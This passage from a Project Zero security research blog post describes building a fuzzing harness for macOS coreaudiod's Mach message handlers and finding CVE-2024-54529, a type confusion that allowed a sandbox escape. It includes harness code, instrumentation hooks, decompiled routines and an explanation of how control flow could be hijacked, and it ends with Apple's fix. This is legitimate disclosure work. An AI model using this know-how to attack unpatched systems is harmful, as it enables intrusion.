understanding of the target, and high impact bugs. In my next post, I will perform a detailed walkthrough of my experience attempting to exploit CVE-2024-54529.

https://googleprojectzero.blogspot.com/2025/05/breaking-sound-barrier-part-i-fuzzing.html
Breaking the Sound Barrier Part I: Fuzzing CoreAudio with Mach Messages
2025-05-09T17:38:00Z | 1746812280

Guest post by Dillon Franke, Senior Security Engineer, 20% time on Project Zero Every second, highly-privileged MacOS system daemons accept and process hundreds of IPC messages. In some cases, these message handlers accept data from sandboxed or unprivileged processes. In this blog post, I’ll explore using Mach IPC messages as an attack vector to find and exploit sandbox escapes. I’ll detail how I used a custom fuzzing harness, dynamic instrumentation, and plenty of debugging/static analysis to identify a high-risk type confusion vulnerability in the coreaudiod system daemon. Along the way, I’ll discuss some of the difficulties and tradeoffs I encountered. Transparently, this was my first venture into the world of MacOS security research and building a custom fuzzing harness. I hope this post serves as a guide to those who wish to embark on similar research endeavors. I am open-sourcing the fuzzing harness I built, as well as several tools I wrote that were useful to me throughout this project. All of this can be found here: https://github.com/googleprojectzero/p0tools/tree/master/CoreAudioFuzzThe Approach: Knowledge-Driven Fuzzing For this research project, I adopted a hybrid approach that combined fuzzing and manual reverse engineering, which I refer to as knowledge-driven fuzzing. This method, learned from my friend Ned Williamson, balances automation with targeted investigation. Fuzzing provided the means to quickly test a wide range of inputs and identify areas where the system’s behavior deviated from expectations. However, when the fuzzer’s code coverage plateaued or specific hurdles arose, manual analysis came into play, forcing me to dive deeper into the target’s inner workings. Knowledge-driven fuzzing offers two key advantages. First, the research process never stagnates, as the goal of improving the code coverage of the fuzzer is always present. Second, achieving this goal requires a deep understanding of the code you are fuzzing. By the time you begin triaging legitimate, security-relevant crashes, the reverse engineering process will have given you extensive knowledge of the codebase, enabling analysis of crashes from an informed perspective. The cycle I followed during this research is as follows:Identify an attack vectorChoose a targetCreate a fuzzing harnessFuzz and produce crashes Analyze crashes and code coverage      Iterate on the fuzzing harnessRepeat steps 4-6  Identify an Attack Vector Standard browser sandboxing limits code execution by restricting direct operating system access. Consequently, exploiting a browser vulnerability typically requires the use of a separate “sandbox escape” vulnerability. Since interprocess communication (IPC) mechanisms allow two processes to communicate with each other, they can naturally serve as a bridge from a sandboxed process to an unrestricted one. This makes them a prime attack vector for sandbox escapes, as shown below. I chose Mach messages, the lowest level IPC component in the MacOS operating system, as the attack vector of focus for this research. I chose them mostly due to my desire to understand MacOS IPC mechanisms at their most core level, as well as the track record of historical security issues with Mach messages.Previous Work and Background Leveraging Mach messages in exploit chains is far from a novel idea. For example, Ian Beer identified a core design issue in 2016 with the XNU kernel related to the handling of task_t Mach ports, which allowed for exploitation via Mach messages. Another post showed how an in-the-wild exploit chain utilized Mach messages in 2019 for heap grooming techniques. I also drew much inspiration from Ret2 Systems’ blog post about leveraging Mach message handlers to find and weaponize a Safari sandbox escape. I won’t spend too much time detailing the ins and outs of how Mach messages work, (that is better left to a more comprehensive post on the subject) but here’s a brief overview of Mach IPC for this blog post:Mach messages are stored within kernel-managed message queues, represented by a Mach portA process can fetch a message from a given port if it holds the receive right for that portA process can send a message to a given port if it holds a send right to that port MacOS applications can register a service with the bootstrap server, a special mach port which all processes have a send right to by default. This allows other processes to send a Mach message to the bootstrap server inquiring about a specific service, and the bootstrap server can respond with a send right to that service’s Mach port. MacOS system daemons register Mach services via launchd. You can view their .plist files within the /System/Library/LaunchAgents and /System/Library/LaunchDaemons directories to get an idea of the services registered. For example, the .plist file below highlights a Mach service registered for the Address Book application on MacOS using the identifier com.apple.AddressBook.AssistantService.         POSIXSpawnType         Adaptive         Label         com.apple.AddressBook.AssistantService         MachServices                          com.apple.AddressBook.AssistantService                                   ProgramArguments                          /System/Library/Frameworks/AddressBook.framework/Versions/A/Helpers/ABAssistantService.app/Contents/MacOS/ABAssistantService          Choose a Target After deciding I wanted to research Mach services, the next question was which service to target. In order for a sandboxed process to send Mach messages to a service, it has to be explicitly allowed. If the process is using Apple’s App Sandbox feature, this is done within a .sb file, written using the TinyScheme format. The snippet below shows an excerpt of the sandbox file for a WebKit GPU Process. The allow mach-lookup directive is used to allow a sandboxed process to lookup and send Mach messages to a service. # File: /System/Volumes/Preboot/Cryptexes/Incoming/OS/System/Library/Frameworks/WebKit.framework/Versions/A/Resources/com.apple.WebKit.GPUProcess.sb (with-filter (system-attribute apple-internal)     (allow mach-lookup         (global-name "com.apple.analyticsd")         (global-name "com.apple.diagnosticd"))) (allow mach-lookup        (global-name "com.apple.audio.audiohald")        (global-name "com.apple.CARenderServer")        (global-name "com.apple.fonts")        (global-name "com.apple.PowerManagement.control")        (global-name "com.apple.trustd.agent")        (global-name "com.apple.logd.events")) This helped me narrow my focus significantly from all MacOS processes, to processes with a sandbox-accessible Mach service: In addition to inspecting the sandbox profiles, I used Jonathan Levin’s sbtool utility to test which Mach services could be interacted with for a given process. The tool (which was a bit outdated, but I was able to get it to compile) uses the builtin sandbox_exec function under the hood to provide a nice list of accessible Mach service identifiers: ❯ ./sbtool 2813 mach com.apple.logd com.apple.xpc.smd com.apple.remoted com.apple.metadata.mds com.apple.coreduetd com.apple.apsd com.apple.coreservices.launchservicesd com.apple.bsd.dirhelper com.apple.logind com.apple.revision …Truncated… Ultimately, I chose to take a look at the coreaudiod daemon, and specifically the com.apple.audio.audiohald service for the following reasons:It is a complex processIt allows Mach communications from several impactful applications, including the Safari GPU processThe Mach service had a large number of message handlersThe service seemed to allow control and and modification of audio hardware, which would likely require elevated privilegesThe coreaudiod binary and the CoreAudio Framework it heavily uses were both closed source, which would provide a unique reverse engineering challengeCreate a Fuzzing Harness Once I chose an attack vector and target, the next step was to create a fuzzing harness capable of sending input through the attack vector (a Mach message) at a proper location within the target. A coverage-guided fuzzer is a powerful weapon, but only if its energy is focused in the right place—like a magnifying glass concentrating sunlight to start a fire. Without proper focus, the energy dissipates, achieving little impact.Determining an Entry Point Ideally, a fuzzer should perfectly replicate the environment and capabilities available to a potential attacker. However, this isn't always practical. Trade-offs often need to be made, such as accepting a higher rate of false positives for increased performance, simplified instrumentation, or ease of development. Therefore, identifying the “right place” to fuzz is highly dependent on the specific target and research goals.Option 1: Interprocess Fuzzing All Mach messages are sent and received using the mach_msg API, as shown below. Therefore, I thought the most intuitive way to fuzz coreaudiod‘s Mach message handlers would be to write a fuzzing harness that called the mach_msg API and allow my fuzzer to modify the message contents to produce crashes. The approach would look something like this: However, this approach had a large downside: since we were sending IPC messages, the fuzzing harness would be in a different process space than the target. This meant code coverage information would need to be shared across a process boundary, which is not supported by most fuzzing tools. Additionally, kernel message queue processing adds a significant performance overhead. Option 2: Direct Harness While requiring a bit more work up front, another option was to write a fuzzing harness that directly loaded and called the Mach message handlers of interest. This would have the massive advantage of putting our fuzzer and instrumentation in the same process as the message handlers, allowing us to more easily obtain code coverage. One notable downside of this fuzzing approach is that it assumes all fuzzer-generated inputs pass the kernel’s Mach message validation layer, which in a real system occurs before a message handler gets called. As we’ll see later, this is not always the case. In my view, however, the pros of fuzzing in the same process space (speed and easy code coverage collection) outweighed the cons of a potential increase in false positives. The approach would be as follows:Identify a suitable function for processing incoming mach messagesWrite a fuzzing harness to load the message handling code from coreaudiod Use a fuzzer to generate inputs and call the fuzzing harnessProfit, hopefullyFinding the Mach Messager Handler To start, I searched for the Mach service identifier, com.apple.audioaudiohald, but found no references to it within the coreaudiod binary. Next, I checked the libraries it loaded using otool. Logically, the CoreAudio framework seemed like a good candidate for housing the code for our message handler. $ otool -L /usr/sbin/coreaudiod /usr/sbin/coreaudiod:         /System/Library/PrivateFrameworks/caulk.framework/Versions/A/caulk (compatibility version 1.0.0, current version 1.0.0)         /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio (compatibility version 1.0.0, current version 1.0.0)         /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation (compatibility version 150.0.0, current version 2602.0.255)         /usr/lib/libAudioStatistics.dylib (compatibility version 1.0.0, current version 1.0.0, weak)         /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation (compatibility version 300.0.0, current version 2602.0.255)         /usr/lib/libobjc.A.dylib (compatibility version 1.0.0, current version 228.0.0)         /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 1700.255.5)         /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1345.120.2) However, I was surprised to find that the path returned by otool did not exist! $ stat /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio stat: /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio: stat: No such file or directoryThe Dyld Shared Cache A bit of research showed me that as of MacOS Big Sur, most framework binaries are not stored on disk but within the dyld shared cache, a mechanism for pre-linking libraries to allow applications to run faster. Thankfully, IDA Pro, Binary Ninja, and Ghidra support parsing the dyld shared cache to obtain the libraries stored within. I also used this helpful tool to successfully extract libraries for additional analysis. Once I had the CoreAudio Framework within IDA, I quickly found a call to bootstrap_check_in with the service identifier passed as an argument, proving the CoreAudio framework binary was responsible for setting up the Mach service I wanted to fuzz. However, it still wasn’t obvious where the message handling code was happening, despite quite a bit of reverse engineering. It turns out this is due to the use of the Mach Interface Generator, (MIG) an Interface Definition Language from Apple that makes it easier to write RPC clients and servers by abstracting away much of the Mach layer. When compiled, MIG message handling code gets bundled into a structure called a subsystem. One can easily grep for these subsystems to find their offsets: $ nm -m ./System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio | grep -i subsystem                  (undefined) external _CACentralStateDumpRegisterSubsystem (from AudioToolboxCore) 00007ff840470138 (__DATA_CONST,__const) non-external _HALC_HALB_MIGClient_subsystem 00007ff840470270 (__DATA_CONST,__const) non-external _HALS_HALB_MIGServer_subsystem Next, I searched in IDA for cross-references to the _HALS_HALB_MIGServer_subsystem symbol, which identified the MIG server function that parsed incoming Mach messages! The routine is shown below, with the first parameter (the rdi register) being the incoming Mach message and the second (the rsi register) being the message to return to the client. The MIG server function extracted the msgh_id parameter from the Mach message and used that to index into the MIG subsystem. Then, the necessary function handler was called. I further confirmed this by setting an LLDB breakpoint on the coreaudiod process (after disabling SIP) for the _HALB_MIGServer_server function. Then, I adjusted the volume on my system, and the breakpoint was hit: In this example, tracing the message handler called from the MIG subsystem showed the _XObject_HasProperty function was called based on the Mach message’s msgh_id. Depending on the msgh_id, a few dozen message handlers were accessible from the MIG subsystem. They are easily identifiable by the convenient __X prefix to their function names added by MIG. The _HALB_MIGServer_server function struck a great balance between getting close to low-level message handling code while still resembling the inputs that a call to mach_msg would take. I decided this was the place to inject fuzz input into.Creating a Basic Fuzzing Harness After identifying the function I wanted to fuzz, the next step was to write a program to read a file and deliver the file’s contents as input to the target function. This might have been as easy as linking the CoreAudio library with my fuzzing harness and calling the _HALB_MIGServer_server function, but unfortunately the function was not exported. Instead, I borrowed some logic from Ivan Fratric and his TinyInst tool (we’ll be talking about it a lot more later) which returns a provided symbol’s address from a library. The code parses the structure of Mach-O binaries, specifically their headers and load commands, to locate and extract symbol information. This made it possible to resolve and call the target function in my fuzzing harness, even when it wasn’t exported. So, the high level function of my harness was as follows:Load the CoreAudio LibraryGet a function pointer for the target function from the CoreAudio LibraryRead an input from a fileCall the target function with the input The full implementation of my fuzzing harness can be found here. An example of invoking the harness to send a message from an input file is shown below: $ ./harness -f corpora/basic/1 -v *******NEW MESSAGE******* Message ID: 1010000 (XSystem_Open) ------ MACH MSG HEADER ------ msg_bits: 2319532353 msg_size: 56 msg_remote_port: 1094795585 msg_local_port: 1094795585 msg_voucher_port: 1094795585 msg_id: 1010000 ------ MACH MSG BODY (32 bytes) ------ 0x01 0x00 0x00 0x00 0x03 0x30 0x00 0x00 0x41 0x41 0x41 0x41 0x41 0x41 0x11 0x00 0x41 0x41 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00   ------ MACH MSG TRAILER ------ msg_trailer_type: 0 msg_trailer_size: 32 msg_seqno: 0 msg_sender: 0 ------ MACH MSG TRAILER BODY (32 bytes) ------ 0xf5 0x01 0x00 0x00 0xf5 0x01 0x00 0x00 0x14 0x00 0x00 0x00 0xf5 0x01 0x00 0x00 0x14 0x00 0x00 0x00 0x7e 0x02 0x00 0x00 0xa3 0x86 0x01 0x00 0x4f 0x06 0x00 0x00  Processing function result: 1 *******RETURN MESSAGE******* ------ MACH MSG HEADER ------ msg_bits: 1 msg_size: 36 msg_remote_port: 1094795585 msg_local_port: 0 msg_voucher_port: 0 msg_id: 1010100 ------ MACH MSG BODY (12 bytes) ------ 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00 Harvesting Legitimate Mach Messages I now had a way to deliver data directly into the MIG subsystem (_HALB_MIGServer_server) I wanted to fuzz. However, I had no idea the specific message size, options, or data the handler was expecting. While a coverage-guided fuzzer will begin to uncover the proper message format over time, it is advantageous to obtain a seed corpus of legitimate inputs when first beginning to fuzz to improve efficiency. To do this, I used LLDB to set a breakpoint on the MIG subsystem and dump the first argument (containing the incoming Mach message). Then, I played around with the operating system to cause Mach messages to be sent to coreaudiod. The Audio MIDI Setup MacOS application ended up being great for this, as it allows one to create, edit, and delete audio devices. Fuzz and Produce Crashes Armed with a small seed corpus and an input delivery mechanism, the next step was to configure a fuzzer to use the created fuzzing harness and obtain code coverage. I used the excellent Jackalope fuzzer built and maintained by Ivan Fratric. I chose Jackalope primarily for its high level of customizability—it allows easy implementation of custom mutators, instrumentation, and sample delivery. Additionally, I appreciated its seamless usage on macOS, particularly its code coverage capabilities powered by TinyInst. In contrast, I tried and failed to collect code coverage using Frida against system daemons on macOS. I used the following command to start a Jackalope fuzzing run: $ jackalope -in in/ -out out/ -delivery file -instrument_module CoreAudio -target_module harness -target_method _fuzz -nargs 1 -iterations 1000 -persist -loop -dump_coverage -cmp_coverage -generate_unwind -nthreads 5 -- ./harness -f @@Iterate on the Fuzzing Harness This harness quickly generated many crashes, a sign I was on the right track. However, I quickly learned that initial crashes are often not indicative of a security bug, but of a design bug in the fuzzing harness itself or an invalid assumption.Iteration 1: Target Initialization One of the difficulties with my fuzzing approach was that my target function (the Mach message handler) expected the HAL system to be in a specific state to begin receiving Mach messages. By simply calling the library function with my fuzzing harness, these assumptions were broken. This caused errors to start popping up. As shown in the diagram below, the harness bypassed much of the bootstrapping functionality the coreaudiod process would normally take care of during startup. Code coverage, as well as error messages, can be very helpful in helping determine some of the initialization steps a fuzzing harness is neglecting. For example, I noticed my data flow would always fail early in most Mach message handlers, logging the message Error: there is no system. It turns out I needed to initialize the HAL System before I could interact correctly with the Mach APIs. In my case, calling the _AudioHardwareStartServer function in my fuzzing harness took care of most of the necessary initialization.Iteration 2: API Call Chaining My first crack at a fuzzing harness was cool, but it made a pretty large assumption: all accessible Mach message handlers functioned independently of each other. As I quickly learned, this assumption was incorrect. As I ran the fuzzer, error messages like the following one started popping up: The error seemed to indicate the SetPropertyData Mach handler was expecting a client to be registered via a previous Mach message. Clearly, the Mach handlers I was fuzzing were stateful and depended on each other to function properly. My fuzzing harness would need to take this into consideration in order to have any hope of obtaining good code coverage on the target. This highlights a common problem in the fuzzing world: most coverage-guided fuzzers accept a single input, (a bunch of bytes) while many things we want to fuzz accept data in a completely different format, such as several arguments of different types, or even several function calls. This Google writeup explains the problem well, as does Ned Williamson’s OffensiveCon Talk from 2019. To get around this limitation, we can use a technique I refer to as API Call Chaining, which considers each fuzz input as a stream that can be read from to craft multiple valid inputs. Thus, each fuzzing iteration would be capable of generating multiple Mach messages. This simple but important insight allows a fuzzer to explore the interdependency of separate function calls using the same code-coverage informed input. The FuzzedDataProvider class, which is part of LibFuzzer but can be included as a header for use with any fuzzing harness, is a great choice for consuming a fuzz sample and transforming it into a more meaningful data type. Consider the following pseudocode: extern "C" int LLVMFuzzerTestOneInput(const uint8_t* data, size_t size) {     FuzzedDataProvider fuzz_data(data, size); // Initialize FDP     while (fuzz_data.remaining_bytes() >= MACH_MSG_MIN_SIZE) { // Continue until we've consumed all bytes         uint32_t msg_id = fuzz_data.ConsumeIntegralInRange(1010000, 1010062);         switch (msg_id) {             case '1010000': {                 send_XSystem_Open_msg(fuzz_data);             }             case '1010001': {                 send_XSystem_Close_msg(fuzz_data);             }             case '1010002': {                 send_XSystem_GetObjectInfo_msg(fuzz_data);             }             ... continued         }      } } This code transforms a blob of bytes into a mechanism that can repeatedly call APIs with fuzz data in a deterministic manner. What’s more, a coverage-guided fuzzer will be able to explore and identify a series of API calls that improves code coverage. From the fuzzer’s perspective, it is simply modifying an array of bytes, blissfully unaware of the additional complexity happening under the hood. For example, my fuzzer quickly identified that most interactions with the audiohald service required a call to the _XSystem_Open message handler to register a client before most APIs could be called. The inputs the fuzzer saved to its corpus naturally reflected this fact over time.Iteration 3: Mocking Out Buggy/Unneeded Functionality Sometimes coverage plateaus, and a fuzzer struggles to explore new code paths. For example, say we’re fuzzing an HTTP server and it keeps getting stuck because it’s trying to read and parse configuration files on startup. If our focus was on the server’s request parsing and response logic, we might choose to mock out the functionality we don’t care about in order to focus the fuzzer’s code coverage exploration elsewhere. In my fuzzing harness’ case, calling the initialization routines was causing my harness to try to register the com.apple.audio.audiohald Mach service with the bootstrap server, which was throwing an error because it was already registered by launchd. Since my harness didn’t need to register the Mach service in order to inject messages, (remember, our harness calls the MIG subsystem directly) I decided to mock out the functionality. When dealing with pure C functions, function interposing can be used to easily modify a function’s behavior. In the example below, I declare a new version of the bootstrap_check_in function that just says returns KERN_SUCCESS, effectively nopping it out while telling the caller that it was successful. #include  #include  // Forward declaration for bootstrap_check_in kern_return_t bootstrap_check_in(mach_port_t bootstrap_port, const char *service_name, mach_port_t *service_port); // Custom implementation of bootstrap_check_in kern_return_t custom_bootstrap_check_in(mach_port_t bootstrap_port, const char *service_name, mach_port_t *service_port) {     // Ensure service_port is non-null and set it to a non-zero value     if (service_port) {         *service_port = 1;  // Set to a non-zero value     }     return KERN_SUCCESS;  // Return 0 (KERN_SUCCESS) } // Interposing array for bootstrap_check_in __attribute__((used)) static struct {     const void* replacement;     const void* replacee; } interposers[] __attribute__((section("__DATA,__interpose"))) = {     { (const void *)custom_bootstrap_check_in, (const void *)bootstrap_check_in } }; In the case of C++ functions, I used TinyInst’s Hook API to modify problematic functionality. In one specific scenario, my fuzzer was crashing the target constantly because the CFRelease function was being called with a NULL pointer. Some further analysis told me that this was a non-security relevant bug where a user’s input, which was assumed to contain a valid plist object, was not properly validated. If the plist object was invalid or NULL, a downstream function call would contain NULL, and an abort would occur. So, I wrote the following TinyInst hook, which checked whether the plist object passed into the function was NULL. If so, my hook returned the function call early, bypassing the buggy code. void HALSWriteSettingHook::OnFunctionEntered() {     printf("HALS_SettingsManager::_WriteSetting Entered\n");     if (!GetRegister(RDX)) {         printf("NULL plist passed as argument, returning to prevent NULL CFRelease\n");         printf("Current $RSP: %p\n", GetRegister(RSP));         void *return_address;                 RemoteRead((void*)GetRegister(RSP), &return_address, sizeof(void *));         printf("Current return address: %p\n", GetReturnAddress());         printf("Current $RIP: %p\n", GetRegister(RIP));         SetRegister(RAX, 0);         SetRegister(RIP, GetReturnAddress());         printf("$RIP register is now: %p\n", GetRegister(ARCH_PC));         SetRegister(RSP, GetRegister(RSP) + 8); // Simulate a ret instruction         printf("$RSP is now: %p\n", GetRegister(RSP));     } } Next, I modified Jackalope to use my instrumentation using the CreateInstrumentation API. That way, my hook was applied during each fuzzing iteration, and the annoying NULL CFRelease calls stopped happening. The output below shows the hook preventing a crash from a NULL plist object passed the troublesome API: Instrumented module CoreAudio, code size: 7516156 Hooking function __ZN11HALS_System13_WriteSettingEP11HALS_ClientPK10__CFStringPKv in module CoreAudio HALS_SettingsManager::_WriteSetting Entered NULL plist passed as argument, returning to prevent NULL CFRelease Current $RSP: 0x7ff7bf83b358 Current return address: 0x7ff8451e7430 Current $RIP: 0x7ff84533a675 $RIP register is now: 0x7ff8451e7430 $RSP is now: 0x7ff7bf83b360 Total execs: 6230 Unique samples: 184 (0 discarded) Crashes: 3 (2 unique) Hangs: 0 Offsets: 13550 Execs/s: 134 The code to reproduce and build this fuzzer with custom instrumentation can be found here: https://github.com/googleprojectzero/p0tools/tree/master/CoreAudioFuzz/jackalope-modificationsIteration 4: Improving Sample Structure The great thing about a fuzzing-centric auditing technique is that it highlights knowledge gaps in the code you are auditing. As you address these gaps, you gain a deeper understanding of the structure and constraints of the inputs that your fuzzing harness should generate. These insights enable you to refine your harness to produce more targeted inputs, effectively penetrating deeper code paths and improving overall code coverage. The following subsections highlight examples of how I identified and implemented opportunities to iterate on my fuzzing harness, significantly enhancing its efficiency and effectiveness.Message Handler Syntax Checks  Code coverage results from fuzzing runs are incredibly telling. I noticed that after running my fuzzer for a few days, it was having trouble exploring past the beginning of most of the Mach message handlers. One simple example is shown below, (explored basic blocks are highlighted in blue) where several comparisons were not being passed , causing the function to error out early on. Here, the rdi register is the incoming Mach message we sent to the handler. The comparisons were checking that the Mach message was well formatted, with a message length set to 0x34 and various options set within the message. If it wasn’t, it was discarded. With this in mind, I modified my fuzzing harness to set the fields in the Mach messages I sent to the _XIOContext_SetClientControlPort handler such that they passed these conditions. The fuzzer could modify other pieces of the message as it pleased, but since these aspects needed to conform to strict guidelines, I simply hardcoded them. These small modifications were the beginning of an input structure I was building for my target. The efficiency of my fuzzing improved astronomically after adding these guidelines to the fuzzer - my code coverage increased by 2000% shortly thereafter.Out-of-Line (OOL) Message Data I noticed my fuzzing setup started generating tons of crashes from a call to mig_deallocate, which frees a given address. At first, I thought I had found an interesting bug, since I could control the address passed to mig_deallocate: I quickly learned, however, that Mach messages can contain various types of Out-of-line (OOL) data. This allows a client to allocate a memory region and place a pointer to it within the Mach message, which will be processed and, in some cases, freed by the message handler. When sending a Mach message with the mach_msg API, the XNU kernel will validate that the memory pointed to by OOL descriptors is properly owned and accessible by the client process. I hadn’t found a vulnerability; my fuzzing harness was simply attached to the target at a point downstream which bypassed the normal memory checks that would have been performed by the kernel. To remedy this, I modified my fuzzing harness to support allocating space for OOL data and passing the valid memory address within the Mach messages I fuzzed.The Vulnerability After many fuzzing harness iterations, lldb “next instruction” commands, and hours spent overheating my MacBook Pro, I had finally begun to acquire an understanding of the CoreAudio framework and generate some meaningful crashes. But first, some background knowledge.The Hardware Abstraction Layer (HAL) The com.apple.audio.audiohald Mach service exposes an interface known as the Hardware Abstraction Layer (HAL). The HAL allows clients to interact with audio devices, plugins, and settings on the operating system, represented in the coreaudiod process as C++ objects of type HALS_Object. In order to interact with the HAL, a client must first register itself. There are a few ways to do this, but the simplest is using the _XSystem_Open Mach API. Calling this API will invoke the HALS_System::AddClient method, which uses the Mach message’s audit token to create a client (clnt) HALS_Object to map subsequent requests to that client. The code block below shows an IDA decompilation snippet of the creation of a clnt object. v85[0] = v5 != 0;   v28 = v83[0];   v29 = 'clnt';   HALS_Object::HALS_Object((HALS_Object *)v13, 'clnt', 0, (__int64)v83[0], v30);   *(_QWORD *)v13 = &unk_7FF850E56640;   *(_OWORD *)(v13 + 72) = 0LL;   *(_OWORD *)(v13 + 88) = 0LL;   *(_DWORD *)(v13 + 104) = 1065353216; Stepping into the HALS_Object constructor, a mutex is acquired before getting the next available object ID before making a call to HALS_ObjectMap::MapObject. void __fastcall HALS_Object::HALS_Object(HALS_Object *this, _BOOL4 a2, unsigned int a3, __int64 a4, HALS_Object *a5) {   unsigned int v5; // r12d   HALB_Mutex::Locker *v6; // r15   unsigned int v7; // ebx   HALS_Object *v8; // rdx   int v9; // eax   v5 = a3;   *(_QWORD *)this = &unk_7FF850E7C200;   *((_DWORD *)this + 2) = 0;   *((_DWORD *)this + 3) = HALB_MachPort::CreatePort(0LL, a2, a3);   *((_WORD *)this + 8) = 257;   *((_WORD *)this + 10) = 1;   pthread_once(&HALS_ObjectMap::sObjectInfoListInitialized, HALS_ObjectMap::Initialize);   v6 = HALS_ObjectMap::sObjectInfoListMutex;   HALB_Mutex::Lock(HALS_ObjectMap::sObjectInfoListMutex);   v7 = (unsigned int)HALS_ObjectMap::sNextObjectID;   LODWORD(HALS_ObjectMap::sNextObjectID) = (_DWORD)HALS_ObjectMap::sNextObjectID + 1;   HALB_Mutex::Locker::~Locker(v6);   *((_DWORD *)this + 6) = v7;   *((_DWORD *)this + 7) = a2;   if ( !v5 )     v5 = a2;   *((_DWORD *)this + 8) = v5;   if ( a4 )     v9 = *(_DWORD *)(a4 + 24);   else     v9 = 0;   *((_DWORD *)this + 9) = v9;   *((_QWORD *)this + 5) = &stru_7FF850E86420;   *((_BYTE *)this + 48) = 0;   *((_DWORD *)this + 13) = 0;   HALS_ObjectMap::MapObject((HALS_ObjectMap *)v7, (__int64)this, v8); } The HALS_ObjectMap::MapObject function adds the freshly allocated object to a linked list stored on the heap. I wrote a program using the TinyInst Hook API that iterates through each object in the list and dumps its raw contents: To modify an existing HALS_Object, most of the HAL Mach message handlers use the HALS_ObjectMap::CopyObjectByObjectID function, which accepts an integer ID (parsed from the Mach message’s body) for a given HALS_Object, which it then looks up in the Object Map and returns a pointer to the object. For example, here’s a small snippet of the ​_XSystem_GetObjectInfo Mach message handler, which calls the HALS_ObjectMap::CopyObjectByObjectID function before accessing information about the object and returning it. HALS_Client::EvaluateSandboxAllowsMicAccess(v5);   v7 = (HALS_ObjectMap *)HALS_ObjectMap::CopyObjectByObjectID((HALS_ObjectMap *)v3);   v8 = v7;   if ( !v7 )   {     v13 = __cxa_allocate_exception(0x10uLL);     *(_QWORD *)v13 = &unk_7FF850E85518;     v13[2] = 560947818;     __cxa_throw(v13, (struct type_info *)&`typeinfo for'CAException, CAException::~CAException);   } An Intriguing Crash Whenever my fuzzer produced a crash, I always took the time to fully understand the crash’s root cause. Often, the crashes were not security relevant, (i.e. a NULL dereference) but fully understanding the reason behind the crash helped me understand the target better and invalid assumptions I was making with my fuzzing harness. Eventually, when I did identify security relevant crashes, I had a good understanding of the context surrounding them. The first indication from my fuzzer that a vulnerability might exist was a memory access violation during an indirect call instruction, where the target address was calculated using an index into the rax register. As shown in the following backtrace, the crash occurred shallowly within the _XIOContext_Fetch_Workgroup_Port Mach message handler. Further investigating the context of the crash in IDA, I noticed that the rax register triggering the invalid memory access was directly derived from a call to the HALS_ObjectMap::CopyObjectByObjectID function. Specifically, it attempted the following:Fetch a HALS_Object from the Object Map based on an ID provided in the Mach messageDereference the address a1 at offset 0x68 of the HALS_ObjectDereference the address a2 at offset 0x0 of a1Call the function pointer at offset 0x168 of a2What Went Wrong? The operations leading to the crash indicated that at offset 0x68 of the  HALS_Object it fetched, the code expected a pointer to an object with a vtable. The code would then look up a function within the vtable, which would presumably retrieve the object’s “workgroup port.” When the fetched object was of type ioct, (IOContext) everything functioned as normal. However, the test input my fuzzer generated was causing the function to fetch a HALS_Object of a different type, which led to an invalid function call. The following diagram shows how an attacker able to influence the pointer at offset 0x68 of a HALS_Object might hijack control flow. This vulnerability class is referred to as a type confusion, where the vulnerable code makes the assumption that a retrieved object or struct is a specific type, but it is possible to provide a different one. The object’s memory layout might be completely different, meaning memory accesses and vtable lookups might occur in the wrong place, or even out of bounds. Type confusion vulnerabilities can be extremely powerful due to their ability to form reliable exploits.Affected Functions The _XIOContext_Fetch_Workgroup_Port Mach message handler wasn’t the only function that assumed it was dealing with an ioct object without checking the type. The table below shows several other message handlers that suffered from the same issue: Mach Message Handler Affected Routine _XIOContext_Fetch_Workgroup_Port _XIOContext_Fetch_Workgroup_Port _XIOContext_Start ___ZNK14HALS_IOContext22HasEnabledInputStreamsEv_block_invoke _XIOContext_StartAtTime ___ZNK14HALS_IOContext16GetNumberStreamsEb_block_invoke _XIOContext_Start_With_WorkInterval ___ZNK14HALS_IOContext22HasEnabledInputStreamsEv_block_invoke _XIOContext_SetClientControlPort _XIOContext_SetClientControlPort _XIOContext_Stop _XIOContext_Stop Apple did perform proper type checking on some of the Mach message handlers. For example, the _XIOContent_PauseIO message handler, shown below, calls a function that checks whether the fetched object is of type ioct before using it. It is not clear why these checks were implemented in certain areas, but not others. The impact of this vulnerability can range from an information leak to control flow hijacking. In this case, since the vulnerable code is performing a function call, an attacker could potentially control the data at the offset read during the type confusion, allowing them to control the function pointer and redirect execution. Alternatively, if the attacker can provide an object smaller than 0x68 bytes, an out-of-bounds read would be possible, paving the way for further exploitation opportunities such as memory corruption or arbitrary code execution.Creating a Proof of Concept Because my fuzzing harness was connected downstream in the Mach message handling process, it was important to build an end-to-end proof-of-concept that used the mach_msg API to send a Mach message to the vulnerable message handler within coreaudiod. Otherwise, we might have triggered a false positive as we did in the case of the mig_deallocate crash where we thought we had a bug, but were actually just bypassing security checks. In this case, however, the bug was triggerable using the mach_msg API, making it a legitimate opportunity for use as a sandbox escape. The proof-of-concept code I put together for triggering this issue on MacOS Sequoia 15.0.1 can be found here. It’s worth noting that code running on Apple Silicon uses Pointer Authentication Codes (PACs) , which could make exploitation more difficult. In order to exploit this bug through an invalid vtable call, an attacker would need the ability to sign pointers, which would be possible if the attacker gained native code execution in an Apple-signed process. However, I only analyzed and tested this issue on x86-64 versions of MacOS.How Apple Fixed the Issue I reported this type confusion vulnerability to Apple on October 9, 2024. It was fixed on December 11, 2024, assigned CVE-2024-54529, and a patch was introduced in MacOS Sequoia 15.2, Sonoma 14.7.2, and Ventura 13.7.2. Interestingly, Apple mentions that the vulnerability allowed for code execution with kernel privileges. That part interested me, since as far as I could tell the execution was only possible as the _coreaudiod group, which was not equivalent to kernel privileges. Apple’s fix was simple: since each HALS Object contains information about its type, the patch adds a check within the affected functions to ensure the fetched object is of type ioct before dereferencing the object and performing a function call. You might have noticed how the offset derefenced within the HALS Object is 0x70 in the updated version, but was 0x68 in the vulnerable version. Often, such struct modifications are not security relevant, but will differ based on other bug fixes or added features.Recommendations To prevent similar type confusion vulnerabilities in the future, Apple should consider modifying the CopyObjectByObjectID function (or any others that 